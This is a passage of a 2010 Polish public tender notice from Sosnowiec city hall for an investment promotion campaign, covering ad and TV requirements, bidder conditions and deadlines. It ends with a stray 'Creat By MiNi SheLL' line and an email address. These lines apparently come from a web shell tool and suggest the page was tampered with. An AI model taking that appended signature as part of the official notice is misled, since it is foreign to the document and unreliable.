1.8.3.Wykonawca zamieści co najmniej 3 ogłoszenia/reklamy, które będą publikowane w różnych terminach, <br>
w formacie obejmującym co najmniej 4 moduły,<br>
1.8.4.Ogłoszenia/reklamy muszą zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:<br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/;<br>
1.8.5.Ogłoszenia/reklamy muszą zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów<br> 
w zakresie informacji i promocji, dostępnymi na stronie:<br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf.<br>
1.8.6.Wykonawca zredaguje treść artykułów sponsorowanych, wykona obróbkę graficzną artykułów sponsorowanych uwzględniając w zawartości merytorycznej informacje z dostarczonych przez zamawiającego materiałów oraz zdjęć/map, w celu ich publikacji,<br>
1.8.7.Wykonawca wykupi powierzchnie reklamowe w czasopismach branżowych, specjalistycznych opisanych <br>
i zaakceptowanych przez zamawiającego zgodnie z wymaganiami zawartymi<br>
w punkcie 1.1.4., <br>
1.8.8.Wykonawca zamieści co najmniej 5 artykułów sponsorowanych, które będą publikowane w różnych terminach, w formacie obejmującym<br>
co najmniej 6 modułów,<br>
1.8.9.Artykuły sponsorowane muszą zawierać oznaczenia spójne z Systemem<br> Identyfikacji Wizualnej zawartej <br>
w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:<br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/;<br>
1.8.10.Artykuły sponsorowane muszą zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów<br> 
w zakresie informacji i promocji, dostępnymi na stronie:<br>
http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf.<br>
1.8.11.Propozycje ogłoszeń/reklam oraz propozycje artykułów sponsorowanych,  uwzględniające opracowaną analizę wyboru kanałów promocji określoną w punkcie 1.1. oraz harmonogram, o którym mowa w punkcie 1.1.5 wykonawca przedstawi w wersji elektronicznej (na adres wrf.rozwoj@um.sosnowiec.pl) do akceptacji zamawiającemu. W przypadku zgłoszenia przez zamawiającego w terminie do trzech dni uwag do propozycji, wykonawca uwzględni je w terminie trzech dni i ponownie przekaże zamawiającemu do akceptacji. Po opublikowaniu zaakceptowanych ogłoszeń/reklam oraz artykułów sponsorowanych wykonawca przekaże zamawiającemu co najmniej po jednym egzemplarzu każdego rodzaju gazety, czasopisma, w których zawarte będą ogłoszenia/reklamy i artykuły sponsorowane. Wykonanie usługi (opisanej w punktach od 1.8.1. do 1.8.11.) z należytą starannością potwierdzone zostanie przez zamawiającego pisemnym protokołem odbioru. <br>
1.9.Wykupienie czasu antenowego w telewizji regionalnej (dostępnej na platformie cyfrowej i w transmisji satelitarnej w celu emisji spotów reklamowych.<br>
1.9.1.Wykonawca wykupi czas antenowy w celu emisji spotów reklamowych (w ilościach i w rodzajach określonych w punkcie 1.4.) w telewizji regionalnej jw. (wszelkie formalności po stronie wykonawcy).<br>
1.9.2.Spoty należy emitować w bloku reklamowym przed widomościami regionalnymi i po wiadomościach regionalnych (w godzinach popołudniowo-wieczornych) dwa razy w ciągu dnia. <br>
1.9.3.Spoty należy emitować naprzemiennie - codziennie jeden z pięciu rodzajów, od poniedziałku do niedzieli przez okres jednego miesiąca. <br>
1.9.4.Zamawiajacy wymaga pozycji premium w każdym bloku reklamowym: pierwszą i ostatnią przed i po wiadomościach. <br>
1.10.Aktualizacja strony internetowej w zakresie ofert inwestycyjnych<br>
1.10.1.Wykonawca dokonania aktualizacji serwisu internetowego Gminy Sosnowiec w zakresie ofert inwestycyjnych Gminy.<br>
1.10.2.Wykonawca sporządzi aktualizację ofert inwestycyjnych w 5 wersjach językowych (polskiej, angielskiej, hiszpańskiej, francuskiej i chińskiej) zgodnie z wymaganiami zapisanymi w punkcie 1.2.4.<br>
1.10.3.Aktualizacja strony internetowej we wskazanym zakresie musi zawierać oznaczenia spójne z Systemem Identyfikacji Wizualnej zawartej w Księdze Identyfikacji Wizualnej marki Sosnowiec dostępnej na stronie:<br>
http://www.sosnowiec.pl/urzad_miejski/artykuły/k1,1,urzad_miejski_w_sosnowcu/k2,40,dokumenty_strategiczne/;<br>
1.10.4.Aktualizacja strony internetowej we wskazanym zakresie musi zawierać zestaw znaków i logotypów zgodnych z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji i promocji, dostępnymi na stronie:<br> http://rpo.silesia-region.pl/zalaczniki/2009/08/11/1249973828.pdf.<br>
1.11.Zamawiający każdorazowo akceptację treści i wzorów propozycji przedmiotu zamówienia określonych <br>
w punktach: od 1.1 do 1.10., które w pełni odpowiadają jego wymaganiom,<br> 
wyrazi w formie elektronicznej. W razie braku akceptacji przez zamawiającego,<br> propozycji przedstawionej przez wykonawcę, wykonawca w terminach <br>
ustalonych w punktach od 1.1. do 1.10. przedstawi zamawiającemu nowe<br> propozycje. Wykonawca wprowadzani zmiany w przedstawianych <br>
propozycjach zgodnie z uwagami przekazanymi przez zamawiającego.<br>
1.12.Zamawiający przekaże wykonawcy wszystkie będące w jego posiadaniu materiały o charakterze informacyjnym (dane lokalizacyjne, powierzchnie, status prawny, forma zbycia, poziom uzbrojenia terenu, przeznaczenie terenu na podstawie zapisów planów zagospodarowania przestrzennego, stan zagospodarowania, zdjęcia i mapy działek/ nieruchomości inwestycyjnych), niezbędne do wykonania przedmiotu zamówienia. Zamawiający dostarczy wy-konawcy wszystkie materiały i dane, najpóźniej w ciągu 7 dni kalendarzowych od dnia skutecznego przekazania przez wykonawcę listy niezbędnych wykonawcy materiałów do należytego wykonania przedmiotu umowy. Listę niezbędnych materiałów do należytego wykonania przedmiotu umowy, wykonawca sporządzi i przekaże zamawiającemu nie później niż w terminie trzech dni licząc od daty podpisania umowy. Jeżeli w trakcie realizacji umowy wystąpi konieczność uzupełnienia informacji lub materiałów niezbędnych do należytego wykonania przedmiotu umowy, wykonawca zobowiązany jest skierować do zamawiającego w tej sprawie wniosek w formie pisemnej. Zamawiający w przypadku wystąpienia takich okoliczności, jest zobowiązany do uzupełnienia informacji lub materiałów w terminie do trzech dni licząc od daty otrzymania wniosku chyba, że nie posiada informacji lub materiałów, o które występuje wykonawca.<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący wiedzy i doświadczenia jeżeli wykonawca udokumentuje , że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę polegającą na organizacji i przeprowadzeniu kampanii promocyjnej dla podmiotu z sektora finansów publicznych o wartości co najmnej 200.000,00 zł., która swoim zakresem obejmowała co najmniej:<br>
a) opracowanie nowych ofert (treść, grafika); <br>
b) zaprojektowanie i umieszczenie reklamy na billboardach przy drogach; <br>
c) zamieszczenie artykułów sponsorowanych w specjlistycznych czasopismach;<br>  
d) kręcenie spotów reklamowych;<br>
e) wykup czasu antenowego w telewizji; <br></p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku dotyczącego dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia i uzna, że wykonawca spełnia ten warunek lub nie spełnia tego warunku jedynie w oparciu o treść zawartą w oświadczeniu wykonawcy o spełnianiu warunków udziału w postępowaniu na świadczenie usług w zakresie przygotowania i przeprowadzenia kampanii promocyjnej pn. Zainwestuj w Sosnowcu - część 1, w ramach projektu Sosnowiec -Miasto dobrych inwestycji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku dotyczącego dysponowania odpowiednimi  osobami zdolnymi do wykonania zamówienia i uzna, że wykonawca spełnia ten warunek lub nie spełnia tego warunku jedynie w oparciu o treść zawartą w oświadczeniu wykonawcy o spełnianiu warunków udziału w postępowaniu na świadczenie usług w zakresie przygotowania i przeprowadzenia kampanii promocyjnej pn. Zainwestuj w Sosnowcu - część 1, w ramach projektu Sosnowiec -Miasto dobrych inwestycji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia jeżeli wykonawca udokumentuje, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli do podpisania oferty, oświadczeń i dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia wykonawcy z postępowania został ustanowiony pełnomocnik-wykonawca zobowiązany jest wraz z ofertą dostarczyć pełnomocnictwo w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział d/s Zamówień Publicznych Urząd Miejski Sosnowiec al. Zwycięstwa 20, 
41-200 Sosnowiec..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2010 godzina 12:00, miejsce: al. Zwycięstwa 20, Sosnowiec, sala 203B..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com